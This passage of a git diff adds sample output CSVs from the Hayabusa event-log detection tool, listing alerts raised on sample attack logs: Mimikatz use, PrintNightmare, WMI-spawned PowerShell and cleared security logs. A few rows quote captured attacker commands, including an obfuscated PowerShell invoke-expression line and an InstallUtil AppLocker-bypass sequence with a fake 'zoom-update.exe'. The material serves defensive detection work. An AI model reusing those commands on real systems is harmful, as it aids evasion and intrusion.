Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID354-808-Mimispool printer installation (PrintNightmare).evtx +2021-10-27 19:28:26.307 +09:00,FS03.offsec.lan,823,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID354-808-Mimispool printer installation (PrintNightmare).evtx +2021-10-27 19:34:49.837 +09:00,FS03.offsec.lan,6416,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,6416 New external device connected (PrintNightmare).evtx" +2021-10-27 19:34:50.024 +09:00,FS03.offsec.lan,4674,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,6416 New external device connected (PrintNightmare).evtx" +2021-10-28 22:41:21.325 +09:00,FS03.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface : Command: ""cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\System32\spoolsv.exe",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/1-Print spool spawned a CMD shell (PrintNightMare).evtx +2021-10-28 22:41:21.325 +09:00,FS03.offsec.lan,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/1-Print spool spawned a CMD shell (PrintNightMare).evtx +2021-11-02 23:15:23.676 +09:00,fs03vuln.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1140-Deobfuscate-Decode Files or Information/ID4688-Certutil download.evtx +2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1086,technique_name=PowerShell : Command: powershell $env:I4Pzl|.(Get-C`ommand ('{1}e{0}'-f'x','i')) : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: OFFSEC\admmig : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx +2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx +2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx +2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx +2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,WMI Spawning Windows PowerShell,,rules/sigma/process_creation/win_wmi_spwns_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx +2021-11-18 16:40:29.566 +09:00,PC-01.cybercat.local,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface : Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /nologo /target:exe /out:zoom-update.exe C:\Users\pc1-user\Desktop\zoom-update.cs : Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe : User: CYBERCAT\pc1-user : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx +2021-11-18 16:42:54.822 +09:00,PC-01.cybercat.local,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1218.004,technique_name=InstallUtil : Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Users\pc1-user\Desktop\zoom-update.exe : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe : User: CYBERCAT\pc1-user : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx +2021-11-18 16:42:54.822 +09:00,PC-01.cybercat.local,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx diff --git a/sample-results/hayabusa-sample-evtx-ResultsDefaultSettings.xlsx b/sample-results/hayabusa-sample-evtx-ResultsDefaultSettings.xlsx new file mode 100644 index 00000000..0b2d2443 Binary files /dev/null and b/sample-results/hayabusa-sample-evtx-ResultsDefaultSettings.xlsx differ diff --git a/sample-results/hayabusa-sample-evtx-ResultsDeprecatedAndNoisyRulesEnabled.csv b/sample-results/hayabusa-sample-evtx-ResultsDeprecatedAndNoisyRulesEnabled.csv new file mode 100644 index 00000000..59d94e55 --- /dev/null +++ b/sample-results/hayabusa-sample-evtx-ResultsDeprecatedAndNoisyRulesEnabled.csv @@ -0,0 +1,14207 @@ +Timestamp,Computer,EventID,Level,RuleTitle,Details,RulePath,FilePath +2013-10-24 01:16:13.843 +09:00,37L4247D28-05,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 01:16:29.000 +09:00,37L4247D28-05,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 01:17:44.109 +09:00,37L4247D28-05,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:17:44.109 +09:00,37L4247D28-05,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:18:09.203 +09:00,37L4247D28-05,2003,low,USB Device Plugged,,rules/sigma/other/driverframeworks/win_usb_device_plugged.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:18:33.828 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:18:33.828 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:18:50.500 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 01:21:30.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 01:21:33.630 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:21:33.630 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:21:33.630 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 01:22:39.911 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:22:39.911 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:22:39.911 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 01:22:39.973 +09:00,IE8Win7,4720,medium,Local user account created,User: IEUser : SID:S-1-5-21-3463664321-2923530833-3546627382-1000,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/DeepBlueCLI/new-user-security.evtx +2013-10-24 01:22:39.973 +09:00,IE8Win7,4720,medium,Local user account created,User: IEUser : SID:S-1-5-21-3463664321-2923530833-3546627382-1000,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 01:22:40.004 +09:00,IE8Win7,4732,high,User added to local Administrators group,User: - : SID: S-1-5-21-3463664321-2923530833-3546627382-1000 : Group: Administrators,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/DeepBlueCLI/new-user-security.evtx +2013-10-24 01:22:40.004 +09:00,IE8Win7,4732,high,User added to local Administrators group,User: - : SID: S-1-5-21-3463664321-2923530833-3546627382-1000 : Group: Administrators,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 01:22:40.005 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:22:40.005 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:22:44.979 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: WIN-QALA5Q3KJ43$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 01:22:44.979 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: WIN-QALA5Q3KJ43 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x298c5 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 01:22:44.979 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: WIN-QALA5Q3KJ43 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x29908 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 01:22:44.979 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x298c5,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 01:23:39.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 01:23:39.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 01:24:00.130 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:24:00.130 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:24:00.161 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 01:24:53.630 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:27:48.911 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:27:48.911 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:28:54.348 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:28:54.348 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:32:51.504 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:05:04.489 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:27:21.754 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x29908,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:27:37.645 +09:00,IE8Win7,21,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:30:47.140 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:30:47.140 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:30:52.625 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:30:58.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 02:31:10.741 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:31:10.741 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:31:10.741 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:32:53.796 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:32:53.796 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:33:10.078 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:33:18.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 02:33:31.593 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:33:31.593 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:33:31.593 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:35:55.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 02:35:55.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 02:36:53.671 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:36:53.671 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x57d5b : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:36:53.671 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x57d8d : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:36:53.671 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x57d5b,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:38:42.499 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:29.131 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:29.131 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:29.131 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event 